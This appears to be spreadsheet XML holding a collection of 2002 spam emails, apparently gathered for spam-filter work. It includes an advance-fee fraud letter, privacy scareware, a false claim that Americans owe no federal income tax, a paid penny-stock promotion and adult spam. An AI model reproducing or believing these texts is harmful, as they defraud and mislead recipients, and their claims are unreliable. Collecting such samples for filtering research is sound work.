ARRANGE FOR THE MONEY TO LEAVE NIGERIA IN YOUR FAVOUR (i.e. AS THE BENEFICIARY) FOR ONWARD\nMOVEMENT TO WHERE YOU CAN RECEIVE THE CONSIGNMENT.\nPLEASE IF YOU ARE WILLING TO ASSIST ME, DO SEND IN\nYOUR REPLY IMMEDIATELY BASED ON THE FOLLOWING: -\n\n1) THE PERCENTAGE OF THIS AMOUNT WHICH YOU INTEND\nTO CHARGE FOR YOUR ASSISTANCE, PLEASE FEEL FREE TO\nEXPRESS YOUR MIND,\n(2) INCLUDE YOUR PRIVATE TELEPHONE AND FAX NUMBERS\nTO ENHANCE THE CONFIDENTIALITY,WHICH THIS BUSINESS\nDEMANDS.\nI SHALL INFORM YOU ON THE NEXT LINE OF ACTION AS\nSOON AS I RECEIVE YOUR POSITIVE RESPONSE. 10% OF THE TOTAL MONEY WILL BE SET ASIDE FOR ANY EXTRA EXPENDITURE. I ASSURE YOU THAT THIS DEAL IS 100% RISK\nFREE AS LONG AS WE KEEP IT TO OURSELVES.\nYOUR URGENT RESPONSE THROUGH MY E-MAIL SHALL BE\nHIGHLY APPRECIATED.\n\nBEST REGARDS,\n\nTAMKO MOBUTU.\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5488</t>
  </si>
  <si>
    <t>To: elizabeth0318@yahoo.com\nFrom: pitster261533310@hotmail.com\nDate: Thu, 25 Jul 2002 06:05:25 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 06:05:25 -0400</t>
  </si>
  <si>
    <t>pitster261533310@hotmail.com</t>
  </si>
  <si>
    <t>elizabeth0318@yahoo.com</t>
  </si>
  <si>
    <t>Keep your private life private. EZ Internet Privacy</t>
  </si>
  <si>
    <t>Computer Privacy Help elizabeth0318 , YOUR INTERNET USAGE IS BEING TRACKED You have no privacy protection. Will your BOSS, WIFE or KIDS find out? DOWNLOAD EZ INTERNET PRIVACY SOFTWARE +++++++++++++++++++++++++++++++++++++++++++ You're in Serious Trouble - It's a Proven Fact! Deleting "Internet Cache and History" will NOT protect you because any of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail, Chat Logs and Everything Else you see or do could easily be recovered to Haunt you forever! How would you feel if a snoop made this information public to your Spouse, Mother &amp; Father, Neighbors, Children, Boss or the Media? It could easily Ruin Your Life! Solve all your problems and enjoy all the benefits of an "As New PC", EZ INTERNET PRIVACY SOFTWARE can Speed-Up your PC/Internet Browser, reclaim Hard Disk space and Professionally Clean your PC in one easy mouse click! Did you know for example that every click you make on Windows 98 Start Menu is logged and stored permanently on a hidden encrypted database within your own computer? Deleting "internet cache and history", will not protect you... your PC is keeping frightening records of both your online and off-line activity. Any of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything Else you or anyone else have ever viewed could easily be recovered - even many years later! How would you feel if somebody snooped this information out of your computer and made it public? Do your children or their friends use your computers? What have they downloaded and tried to delete? Act now! And stop these files coming "back from the dead" to haunt you!   CLICK  HERE       to be removed Click Here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490</t>
  </si>
  <si>
    <t>To: jjr@yahoo.com\nFrom: stg4@hotmail.com\nDate: Thu, 25 Jul 2002 05:55:37 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 05:55:37 -0500</t>
  </si>
  <si>
    <t>stg4@hotmail.com</t>
  </si>
  <si>
    <t>jjr@yahoo.com</t>
  </si>
  <si>
    <t>Hi</t>
  </si>
  <si>
    <t>Do you dream of working for yourself? From the\nluxury of your own home?\n\nTHEN STOP DAYDREAMING AND DO SOMETHING ABOUT IT!\nIT WONT HAPPEN JUST SITTING THERE!\n\nFREE INFO! FREE INFO! FREE INFO!\nNo obligation whatsoever.\n\n[URL]http://www.lotsonet.com[/URL]\n\nWe are a fortune 500 company and we want motivated\nindividuals who are willing to work from home.  This\nis not a get rich quick scheme, you will have to work,\nbut you can do it from the comfort of your own home,\nand make much more than you can working for someone\nelse.\n\nFREE INFO! FREE INFO! FREE INFO!\nNo obligation whatsoever.\n[URL]http://www.lotsonet.com[/URL]\n\n\nTo be removed from this list go to:\n\n[URL]http://www.lotsonet.com[/URL]\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http://www.lotsonet.com http://www.lotsonet.com http://www.lotsonet.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5456</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: GodSmell&lt;fm21c@hotmal.com&gt;\nDate: Thu, 25 Jul 2002 04:57:09 +0900</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 04:57:09 +0900</t>
  </si>
  <si>
    <t>GodSmell&lt;fm21c@hotmal.com&gt;</t>
  </si>
  <si>
    <t>[]ð_x0001_&amp;ð_x0001_-_x0002_ð_x0001_</t>
  </si>
  <si>
    <t>top   =BE=C8=B3=E7=C7=CF=BC=BC=BF=E4. =C0=FA=C8=F1 GodSmell=C0=BA =B8=ED=C7=B0=C7=E2=BC=F6=B8=A6 =C0=FC=B9=AE=C0= =FB=C0=B8=B7=CE =C6=C7=B8=C5=C7=CF=B4=C2 =C7=E2=BC=F6 =C0=FC=B9=AE =BC=EE= =C7=CE=B8=F4=C0=D4=B4=CF=B4=D9. =B9=E9=C8=AD=C1=A1 =B0=A1=B0=DD=B0=FA =BA=F1=B1=B3=C7=D8=BA=B8=BC=BC=BF=E4= !   = =B1=D7=B8=B0=C6=BC 50ml 24,000=BF=F8= =BC=F6=C0=CC=B7=AF=BA=EA 30ml 32,000=BF=F8= = =B0=D6=B6=FB =C5=F5=C0=A9=C4=C9잌 48,000=BF=F8= =B6=FB=C4=DE =B9=CC=B6=F3=C5=AC 7ml 10,000=BF=F8=   =B8=A3=BA=FC =B0=D5=C1=B6 30ml 22,000=BF=F8= = =C7=C3=B6=F3=BF=F6 =B9=D9=C0=CC =B0=D5=C1=B6 4ml 10,000=BF=F8= =B9=CC=B6=F3=C5=AC 30ml 41,000=BF=F8= =BE=C8=B3=AA=BC=F6=C0=CC 30ml 25,000=BF=F8= =C8=CE=BE=C0 =B4=F5 =C0=FA=B7=C5=C7=CF=C1=D2?^^" =C0=FA=C8=F1 GodSmell=C0=BA =B4=D9=B8=A5 =C7=E2=BC=F6 =BC=EE=C7=CE=B8=F4=B0= =FA=B4=C2 =B4=DE=B8=AE =BD=C5=BB=F3=C7=B0=B5=B5 =B8=B9=C0=CC =B1=B8=BA=F1= =B5=C7=BE=EE =C0=D6=B4=E4=B4=CF=B4=D9.     = =BF=EF=C6=AE=B6=F3=B9=D9=C0=CC=BF=C3=B7=BF =BE=C6=C4=ED=BE=C6=C6=BD =C7=C3= =B6=F3=BD=BA=C6=BD(2002=C7=D1=C1=A4) 80ml 35,000=BF=F8= =B5=F0=BE=EE =BF=A1=BD=BA=BB=DA=BE=C6 =BF=C8=B9=C7 50ml 30,000=BF=F8= = =B4=BA =B4=EB=B3=AA=B9=AB =B0=D5=C1=B6 30ml 27,000=BF=F8= =B5=F0=BE=EE =BF=A1=BD=BA=BB=DA=BE=C6 30ml 27,000=BF=F8=   = =B4=DE=B8=AE =BD=BA=C5=B8=C0=CF 30ml 24,000=BF=F8= =C0=E7=B1=D4=BE=EE 40ml 30,000=BF=F8= = =BF=EF=C6=AE=B6=F3 =B9=D9=C0=CC=BF=C3=B7=BF =C6=F7=B8=C7 50ml 30,000=BF=F8= = =BF=C0=C0=CF=B8=B1=B8=AE 30ml 21,000=BF=F8= =C0=FA=C8=F1 GodSmell=C0=BA =BB=E7=C0=BA=C7=B0=B5=B5 =BE= =C6=C1=D6 =C7=AA=C1=FC=C7=CF=B4=E4=B4=CF=B4=D9. =BE=EE=BC=AD =BB=A1=B8=AE =BC=EE=C7=CE=C0=C7 =C1=F1=B0=C5=BF=F2=C0=BB =B8= =B8=B3=A3=C7=CF=BC=BC=BF=E4~!^^" *******=BB=F3=C7=B0=C0=BB =C5=AC=B8=AF=C7=CF=BD=C3=B8=E9 GodSmell=B7=CE =C0= =CC=B5=BF=C7=D5=B4=CF=B4=D9!^^"******* Copyright =A8=CF =B0=AB=BD=BA=B8=E1=C7=E2=BC=F6 All Rights Reserved. 019-= 476-9314 =BB=F3=C8=A3=B8=ED : GODSMELL   =BB=E7=BE=F7=C0=DA=B5=EE=B7=CF=B9=F8=C8=A3=  : 206-11-48025   =B4=EB=C7=A5 : =C7=D1=B1=D4=BD=C4  =BB=E7=BE=F7=C0=E5=BC=D2=C0=E7=C1=F6 : =BC=AD=BF=EF=BD=C3 =BC=BA=B5=BF=B1= =B8 =C7=E0=B4=E71=B5=BF 286-23 =C1=A4=BF=EC=BA=F4=B5=F9 305=C8=A3  =BA=BB =B8=DE=C0=CF=C0= =BA =C1=A4=BA=B8=C5=EB=BD=C5=BA=CE =B1=C7=B0=ED =BB=E7=C7=D7=BF=A1 =C0=C7= =B0=C5 =C1=A6=B8=F1=BF=A1 [=B1=A4=B0=ED]=B6=F3 =C7=A5=BD=C3=B5=C8 =B1=A4=B0=ED =B8= =DE=C0=CF=C0=D4=B4=CF=B4=D9. =BC=F6=BD=C5= =B0=C5=BA=CE =B9=F6=C6=B0=C0=BB =C5=AC= =B8=AF=C7=CF=BD=C3=B8=E9 =BC=F6=BD=C5=B0=C5=BA=CE=C3=B3=B8=AE=B0=A1 =C0=CC= =B7=E7=BE=EE =C1=FD=B4=CF=B4=D9. The certai= nly big help is will become firm belief like this to send the mail to the minutes when, our services use the transactions the at the electron it gives.   To the minutes when it refuses the mail reception the = toil which stands it is but it will grow a reception refusal, when lik it does= , it will eliminate you mail from our data immediately and it will give. the v= ery last on push --DeathToSpamDeathToSpamDeathToSpam-- ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-Sightings mailing list Spamassassin-Sightings@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5491</t>
  </si>
  <si>
    <t>To: cpunks@minder.net\nFrom: Account Password &lt;cu@africamail.com&gt;\nDate: Thu, 25 Jul 2002 04:23:13 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 04:23:13 -0700</t>
  </si>
  <si>
    <t>Account Password &lt;cu@africamail.com&gt;</t>
  </si>
  <si>
    <t>Fw: Re: User Name &amp; Password to Membership To 15 Sites cpunks@minder.net pknkn</t>
  </si>
  <si>
    <t>##################################################\n#                                                #\n#                 Adult Club=99                    #\n#           Offers FREE Membership               #\n#                                                #\n##################################################\n\n15 of the Best Adult Sites on the Internet for FREE!\n&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW\n&gt;&gt;&gt;  Your User Name And Password is.\n&gt;&gt;&gt;  User Name: cpunks@minder.net\n&gt;&gt;&gt;  Password: d0949w4z\n\n---------------------------------------\n\nNEWS 07/01/02\nWith just over 2.2 Million Members that signed up for FREE, Last month th=\nere were 429,947 New=20\nMembers. Are you one of them yet???\n\n---------------------------------------\n\nOur Membership FAQ\nQ. Why are you offering free access to 15 adult membership sites for free=\n?\nA. I have advertisers that pay me for ad space so you don't have to pay f=\nor membership.\n\nQ. Is it true my membership is for life?\nA. Absolutely you'll never have to pay a cent the advertisers do.\n\nQ. Can I give my account to my friends and family?=20\nA. Yes, as long they are over the age of 18.\n\nQ. Do I have to sign up for all 15 membership sites?\nA. No just one to get access to all of them.=20\n\nQ. How do I get started?=20\nA. Click on one of the following links below to become a member.\n\n---------------------------------------\n\n# 15. &gt; NEW! &gt; Celebs TV=20\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 14. &gt; NEW! &gt; Naughty Live Cam\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n\n# 13. &gt; Adults Farm\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 12. &gt; Fetish Door\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n\n# 11. &gt; Teen Sex Dolls (Voted Best Adult Site 2001-2002!)\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n#10. &gt; Sweet Latinas\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n\n# 9. &gt; Fetishes\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 8. &gt; Tits Patrol\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 7. &gt; Pinklicious\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 6. &gt; Play House Porn\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 5. &gt; Sinful Cherries\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 4. &gt; Asian Sex Fantasies\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 3. &gt; Hot Stripper Sluts\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 2. &gt; Lesbian Lace=20\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n=20\n# 1. &gt; Gay Porn Club\nClick Here &gt; [URL]http://157.237.128.20[/URL]\n---------------------------------------\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nRemoval Instructions:\n\nYou have received this advertisement because you have opted in to receive=\n free adult internet=20\noffers and specials through our affiliated websites. If you do not wish t=\no receive further emails or=20\nhave received the email in error you may opt-out of our database here htt=\np://157.237.128.20/optout/=20\n. Please allow 24 hours for removal.\n\nThis e-mail is sent in compliance with the Information Exchange Promotion=\n and Privacy Protection=20\nAct. section 50 marked as 'Advertisement' with valid 'removal' instructio=\nn.\n\ntosjkmackiswohspfkxywojjgmlr\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http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://157.237.128.20 http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5476</t>
  </si>
  <si>
    <t>To: Netizen@aol.com\nFrom: Dale0110f17@msn.com\nDate: Thu, 25 Jul 2002 03:54:29 +0100</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 03:54:29 +0100</t>
  </si>
  <si>
    <t>Dale0110f17@msn.com</t>
  </si>
  <si>
    <t>Netizen@aol.com</t>
  </si>
  <si>
    <t>You Only THINK You're U.S. Citizen!!                                                              8403ZmSX2-110-12</t>
  </si>
  <si>
    <t>\n\n###  **You only _THINK you're a U.S. citizen!!\n\nIf you were born in Washington D.C., Puerto Rico,  \nGuam, the Virgin Islands or some other U.S.  \npossession; you're right and I'm wrong.\n\n_BUT_ \- - If you were born in one of the 50 united  \nStates of America, you ARE NOT a U.S. citizen.  \nRather, you are a Citizen  of Idaho, Ohio, Maine,  \netc.; the state of the Union in which you were __BORN!__\n\nThis simple reality holds serious benefits for you!\n\nSince you ARE NOT a "federal" citizen, you owe  \n__NO federal income taxes__. The IRS can only demand  \nincome tax payments from _3 kinds of citizens:_\n\n1\. Those who are citizens of the U.S.!  \n2\. Anyone who receives "income" from a U.S. source  \n(and wait until you find out what "income" really is!).  \n3\. Any Citizen of one of the 50 united States of America  \nwho VOLUNTEERS to pay it!\n\nBelieve it or not, - - When you sign an IRS W4 form for  \nyour "employer" you have entered into a "hidden"  \ncontract and have VOLUNTEERED to pay!\n\nOur web site is _FILLED_ with educational and eye  \nopening information on how you've been __tricked__ into  \nthis - AND how you can free yourself from the treachery.\n\nFor ONLY ONE MORE e-mail to point you to our web site:  \nReply with "Citizen" in the subject box.\n\nClick Here\n\nPS: To be removed from the list, just put  "Remove" in subject line.\n\nClick Here\n\n**\n\n0489xPJK9-7l10 \--DeathToSpamDeathToSpamDeathToSpam--\n\------------------------------------------------------- This sf.net email is\nsponsored by: Jabber - The world's fastest growing real-time communications\nplatform! Don't just IM. Build it in! [URL]http://www.jabber.com[/URL]\n_______________________________________________ Spamassassin-Sightings mailing\nlist Spamassassin-Sightings@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n</t>
  </si>
  <si>
    <t>5513</t>
  </si>
  <si>
    <t>To: &lt;wngnuts@aol.com&gt;\nFrom: "Julia" &lt;xy2fiww2h4684@hotmail.com&gt;\nDate: Thu, 25 Jul 2002 01:34:47 -1900</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 01:34:47 -1900</t>
  </si>
  <si>
    <t>"Julia" &lt;xy2fiww2h4684@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Toners and inkjet cartridges for less....                   P</t>
  </si>
  <si>
    <t>Tremendous Savings on Toners,  Inkjets, FAX, and Thermal Replenishables!! Toners 2 Go is your secret weapon to lowering your cost for High Quality, Low-Cost printer supplies!  We have been in the printer replenishables business since 1992, and pride ourselves on rapid response and outstanding customer service.  What we sell are 100% compatible replacements for Epson, Canon, Hewlett Packard, Xerox, Okidata, Brother, and Lexmark; products that meet and often exceed original manufacturer's specifications. Check out these prices!         Epson Stylus Color inkjet cartridge (SO20108):     Epson's Price: $27.99     Toners2Go price: $9.95!        HP LaserJet 4 Toner Cartridge (92298A):           = ; HP's Price: $88.99            Toners2Go   price: $41.75!   Come visit us on the web to check out our hundreds of similar bargains at Toners 2 Go!      request to be removed by clicking HERE c.l.kyle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483</t>
  </si>
  <si>
    <t>To: cpuma@earthlink.net, cpumatt@trib.com, cpun@rocketmail.com,\nFrom: Pamela@Blinkese.com ()\nDate: Thu, 25 Jul 2002 01:23:03 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 01:23:03 -0400</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by  (Pamela@Blinkese.com) on Thursday, July 25, 2002 at 01:23:03 --------------------------------------------------------------------------- :  Hey wassup my names mandy, I got this new webpage, Im trying to see if things look alright before i publish it. Can you come and check it out for me! Check it out! ---------------------------------------------------------------------------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512</t>
  </si>
  <si>
    <t>To: &lt;Jon.G@adin.be&gt;\nFrom: "E-Business News" &lt;Jon.G@adin.be&gt;\nDate: Thu, 25 Jul 2002 01:04:05 -1900</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 01:04:05 -1900</t>
  </si>
  <si>
    <t>"E-Business News" &lt;Jon.G@adin.be&gt;</t>
  </si>
  <si>
    <t>&lt;Jon.G@adin.be&gt;</t>
  </si>
  <si>
    <t>Lower your company phone bill every month!</t>
  </si>
  <si>
    <t>New Web Technology UNLIMITED WEB CON= FERENCING Subscribe to the Web Conference C= enter for only $40.00 per month! (Connects up to 15 participants at a time p= lus audio charges) Conduct real-time interactive meetings and presentations ove= r the Internet        Application sharing       Review and revise documents in real-time       Record and archive your meeting        Simulate a live Classroom       Quickly hold a meeting with anyone anywhere in the world       Lowest rate $.18 per minute for audio (toll charges included= ) Call anytime, from anywhere, to anywhere       Quality, easy to use service FREE DEMO Eliminate or Reduce Travel Expense Try this on for savings...  and turn those unnecessary trips into problem solving and fact finding con= ferences,  saving time and wear and tear on your overworked business staff.  To find out more abo= ut this revolutionary concept, fill out the form below. Required Input Field* Name* Web              Address Company              Name*             State* Business              Phone* Home              Phone Email              Address* All information g= iven herein is strictly confidential and will not be re-distributed       for any reason other than for the specific use intended.&lt;= br&gt;       To be removed from our distribution lists, please         Cl= ick        here..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504</t>
  </si>
  <si>
    <t>To: &lt;Money.In.Motion@babbage.entorno.es&gt;\nFrom: "Term Quotes, Life Insurance of America" &lt;CXIN05@excite.com&gt;\nDate: Thu, 25 Jul 2002 00:57:41 -1700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 00:57:41 -1700</t>
  </si>
  <si>
    <t>"Term Quotes, Life Insurance of America" &lt;CXIN05@excite.com&gt;</t>
  </si>
  <si>
    <t>&lt;Money.In.Motion@babbage.entorno.es&gt;</t>
  </si>
  <si>
    <t>Traders                   DQB</t>
  </si>
  <si>
    <t>= **THE WALL STREET WEEKLY**   ---   | |  **Stock Pick of The Day: China Xin Network Media Corp.  (OTC BB:CXIN)**   ---   | |  |   ---|---    ** _OPINIO= N_ :**|  **      BUY**    ** _SYMBOL_ :**|  **     CXIN**|  **Industry:**|  **  Publishing**   = **Short Term Opinion:**|  **  Outperform**    **Long Term Opinion:**|  **  Accumulate**    **Recent Price:**|  **       $0.05    **12 Month Trading Range:**|  **$0.07 - $= 0.95**    **Avg. Volume:**|  **   &amp;= nbsp;  47,940**    **= Approx. Float:**|  **    5 Million**    **Insider &amp; Institu= tional Holdings:**| 92% Shares**    | &amp;n= bsp;       **" CXIN MEDIA CORPORATION, THE BLOOMBERG OF CHINA.&amp;q= uot; \- Finance and Investment Magazine, December 2001     **THE COMPANY: CXIN Media Corporation is an integrated= media company focusing on the dissemination and aggregation of informatio= n. Currently, CXINs core business is in the publishing and aggregation of = Financial, Economic, and Business Information on the Peoples Republic of C= hina. _The value CXIN Media provides is its ability to source, package, = and present information that is highly in demand by the market._ = Apart from the core print and electr= onic publishing business, CXIN is involved in other related businesses, su= ch as organizing and managing events such as conferences, seminars, and tr= aining in the field of wealth management and personal finance.=   These areas are closely linked to the cor= e competencies of the company and they intend to leverage on the brands th= at they have built to further drive the growth potential. CXIN holds the key to success in the Peoples Repub= lic of China. **In May of 2001 they acquired the 12 year exclusive right = from the China Economic Information Network, a corporation under the direc= t management of the State Information Center and the State Planning Develo= pment Commission, Chinas highest economic decision body.** = **HIGHLIGHTS:** = May 2001, CXIN acquires the 12 year Excl= usive license to distribute all information in English, French and Spanish= , Internationally. February 20= 02, CXIN announced its first distribution contract with a leading market r= esearch provider. March 2002, = CXIN announces it had signed with yet another distributor for its unique f= inancial , economic and business information on the Peoples Republic of Ch= ina. May 7, 2002, CXIN a= nnounces a distribution agreement with Internet Securities, a Euromarket c= ompany and the _leading provider of emerging market securities_. May 9, 2002, CXIN announces it had= hired one of Asias top media consulting firms, Telesis, and its President= , Mr. Cyril Pereira, the former Director of Operation of the South China M= orning Post and Asia Magazine. June 12, 2002, CXIN launched its China Business portal and began selling = subscriptions. June 24, 2002, = CXIN announces the acquisition of  **Smart Investor Magazine** and= related business. _This magazine will bring over $1.2 Million in consol= idated revenues.  _ Jul= y 15, 2002, CXIN announces the license agreement with Lexis-Nexis, _one = of the worlds largest aggregators._  **INVESTMENT CONSIDERATIONS:** According to the reports from Morgan-Stanley, w= hich analyzes the worlds superpowers in 11 industries, it only takes 8 yea= rs to build a media empire, which means the return on investment in this i= ndustry will be far greater than that of pharmaceutical, household merchan= dise, energy, or even banking. We believe that CXIN Media is well position= ed to become the next superpower of the media market in the fast growing C= hinese market. The superior management and its exclusive agreement granted= by the Chinese government provide the company with an "unfair advant= age" over its potential competitors. We believe that the recent licen= se agreements signed with some of the largest information providers in the= world as well as the Smart Investor Magazines and related business will e= nable the company to meet its revenue and profit expectation of $50 Millio= n within the next 5 years and dependent on market condition for refinancin= g, we foresee that CXIN Media could easily double their expected revenue a= nd profits through strategic acquisitions. The current price of the shares= do not reflect the value of this growth company, in comparison to the sec= tor CXIN Media should be currently trading between $0.25 to $0.50 and abov= e this value when we take into consideration the growth factors.   Disclaimer: The Wall Street W= eekly provides information on selected companies that it believes has inve= stment potential. The Wall Street Weekly is not a registered investment ad= visor or broker - dealer. This report is provided as an information servic= e only, and the statements and opinions in this report should not be const= rued as an offer or solicitation to buy or sell any security. The Wall Str= eet Weekly accepts no liability for any loss arising from an investors rel= iance on or use of this report. An investment in CXIN is considered to be = highly speculative and should not be considered unless a person can afford= a complete loss of investment. The Wall Street Weekly has been retained t= o distribute this report on CXIN and has been paid six hundred dollars by = a third party. This report involves forward looking statements, which invo= lve risk, and uncertainties that may cause actual results to differ materi= ally from those set forth in the forward - looking statements. For further= details concerning these risks and uncertainties, see the SEC filings of = CXIN including the companys most recent annual and quarterly reports.      &lt;= font face=3DArial size=3D1 color=3D#5F5F5F&gt;If you wish to no longer receiv= e your FREE subscription or have received this report in error, please cli= ck HERE.&lt;= /tr&gt;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481</t>
  </si>
  <si>
    <t>To: &lt;cpunks@minder.net&gt;\nFrom: S Demir &lt;yjnssjvy@kahkaha.com&gt;\nDate: Thu, 25 Jul 2002 00:38:21 -0400</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 00:38:21 -0400</t>
  </si>
  <si>
    <t>S Demir &lt;yjnssjvy@kahkaha.com&gt;</t>
  </si>
  <si>
    <t>Mp3 ve klipler</t>
  </si>
  <si>
    <t>JetMp3 T=FCrkiye'de ilk kez uygulanan bir sistemi hayata ge=E7irdi.\n[URL]http://www.jetmp3.com[/URL]\nBu sistemle art=FDk =DDstedi=F0iniz MP3 leri ister tek tek isterseniz alb=\n=FCmler halinde ve birka=E7 dakika i=E7inde sanki disketten bilgisayar=FD=\nn=FDza y=FCkler gibi s=FCratle indirebilirsiniz. Turk ve Yabanc=FD alb=FC=\nmler, klipler ve daha fazlas=FD...\n11gb lik ar=FEivimize g=F6z atmak i=E7in t=FDklay=FDn: [URL]http://www.jetmp3[/URL]\ncom\n\n\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http://www.jetmp3.com http://www.jetmp3 http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5475</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: "Free" &lt;Free-2657w02@yahoo.com&gt;\nDate: Thu, 25 Jul 2002 00:38:17 -0200</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 00:38:17 -0200</t>
  </si>
  <si>
    <t>"Free" &lt;Free-2657w02@yahoo.com&gt;</t>
  </si>
  <si>
    <t>FREE e-Book Publishing Software - Download NOW!</t>
  </si>
  <si>
    <t>**FREE SOFTWARE!** =20  **LIMITED TIME OFFER!***   ---   **FREE DOWNLOAD** | =20 **MORE INFO** | =20 **SAMPLES** | =20 **UNSUBSCRIBE**   DOWNLOAD 1   DOWNLOAD 2   =20  | =20  MIRROR site 1   MIRROR site 2   |  SAMPLES site 1   SAMPLES site 2   =20  | =20  UnSubscribe 1   UnSubscribe 2   =20   =20 **Digital Authoring Tools** &lt;= /a&gt;=20 offers FREE software that can help you CREATE PROFESSIONAL, **3D** pag= e-turning and slide-show=20 style digital brochures, documents, books, catalogs, invitations, photo a= lbums, resumes, newsletters,=20 menus, email promotions, magazines, presentations and more!      For more info, samples or a free download, click the ap= propriate link above! Server demand is extremely high for this limited time free software offer= . **Please try these=20 links periodically if a   site seems slow or unreachable.**      Copyright =A9 2002 - Affiliate ID #1269   *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 = page spread) limit.      \--DeathToSpamDeathToSpamDeathToSpam-- \------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing real-time communications platform! Don't just IM. Build it in! [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-Sightings mailing list Spamassassin-Sightings@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5527</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: akrpiz8555v48@aol.com\nDate: Thu, 25 Jul 0102 21:47:22 -0700</t>
  </si>
  <si>
    <t>Thu, 25 Jul 0102 21:47:22 -0700</t>
  </si>
  <si>
    <t>akrpiz8555v48@aol.com</t>
  </si>
  <si>
    <t>No Cost Out Of Pocket: REFI 5189ssQW0-729B-13</t>
  </si>
  <si>
    <t>------=_NextPart_000_00D6_44B11E8C.E6018B42\nContent-Type: text/html; charset="iso-8859-1"\nContent-Transfer-Encoding: base64\n\n\nPGh0bWw+DQoNCjxESVY+Jm5ic3A7PC9ESVY+PEZPTlQgc2l6ZT0yIFBUU0la\nRT0iMTAiPg0KICAgICAgPFRBQkxFIA0KICAgICAgc3R5bGU9IkJPUkRFUi1S\nSUdIVDogIzAwNjYwMCAxMnB4IGRvdWJsZTsgUEFERElORy1SSUdIVDogNHB4\nOyBCT1JERVItVE9QOiAjMDA2NjAwIDEycHggZG91YmxlOyBQQURESU5HLUxF\nRlQ6IDRweDsgUEFERElORy1CT1RUT006IDFweDsgQk9SREVSLUxFRlQ6ICMw\nMDY2MDAgMTJweCBkb3VibGU7IFBBRERJTkctVE9QOiAxcHg7IEJPUkRFUi1C\nT1RUT006ICMwMDY2MDAgMTJweCBkb3VibGU7IEJPUkRFUi1DT0xMQVBTRTog\nY29sbGFwc2UiIA0KICAgICAgYm9yZGVyQ29sb3I9IzExMTExMSBoZWlnaHQ9\nMzM4IGNlbGxTcGFjaW5nPTAgYm9yZGVyQ29sb3JEYXJrPSNmZmZmZmYgDQog\nICAgICBjZWxsUGFkZGluZz0wIHdpZHRoPTUzOSBib3JkZXJDb2xvckxpZ2h0\nPSNmZmZmZmYgYm9yZGVyPTA+DQogICAgICAgIDxUQk9EWT4NCiAgICAgICAg\nPFRSPg0KICAgICAgICAgIDxURCB3aWR0aD00IGhlaWdodD00MjM+Jm5ic3A7\nPC9URD4NCiAgICAgICAgICA8VEQgDQogICAgICAgICAgc3R5bGU9IkJPUkRF\nUi1SSUdIVDogMHB4IHNvbGlkOyBCT1JERVItVE9QOiAwcHggc29saWQ7IEJP\nUkRFUi1MRUZUOiAwcHggc29saWQ7IEJPUkRFUi1CT1RUT006IDBweCBzb2xp\nZCIgDQogICAgICAgICAgdkFsaWduPXRvcCBhbGlnbj1sZWZ0IHdpZHRoPTUz\nNSBoZWlnaHQ9NDIzPg0KICAgICAgICAgICAgPFRBQkxFIHN0eWxlPSJCT1JE\nRVItQ09MTEFQU0U6IGNvbGxhcHNlIiBib3JkZXJDb2xvcj0jMTExMTExIA0K\nICAgICAgICAgICAgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz00IHdpZHRo\nPSI5NSUiIGJnQ29sb3I9I2ZmZmZmZiBib3JkZXI9MD4NCiAgICAgICAgICAg\nICAgPFRCT0RZPg0KICAgICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAg\nICAgPFREIHZBbGlnbj10b3AgYWxpZ249cmlnaHQgaGVpZ2h0PTQyND4NCiAg\nI